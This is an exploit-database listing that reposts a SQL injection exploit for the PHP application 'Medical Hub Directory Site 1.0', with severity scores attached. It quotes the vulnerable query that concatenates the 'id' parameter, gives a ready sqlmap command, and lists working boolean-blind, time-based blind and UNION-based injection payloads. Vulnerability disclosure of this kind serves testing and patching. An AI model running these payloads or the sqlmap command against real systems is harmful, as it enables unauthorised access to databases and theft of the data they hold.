Advertisement






Medical Hub Directory Site 1.0 SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040003

Below is a copy:

Medical Hub Directory Site 1.0 SQL Injection
# Exploit Title: Medical Hub Directory Site - 'id' SQL Injection
# Date: 30/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux


# Vulnerable Code

line 9 in file "/mhds/clinic/view_details.php"

$categories = $conn->query("SELECT c.category_id,cc.name as category FROM clinic_category c inner join category_list cc on c.category_id = cc.id where c.clinic_id = '{$id}' ")->fetch_all(MYSQLI_ASSOC);

# Sqlmap command:

sqlmap -u 'http://localhost/mhds/?page=clinic/view_details&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=clinic/view_details&id=1' AND 8622=8622-- pBEY

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=clinic/view_details&id=1' AND (SELECT 9741 FROM (SELECT(SLEEP(5)))AmHc)-- Gwec

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: page=clinic/view_details&id=-4315' UNION ALL SELECT CONCAT(0x71717a7071,0x4d5246716246517044556c4d4a584f5853646d526a6957666463567a514f73504745636759635454,0x71786a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum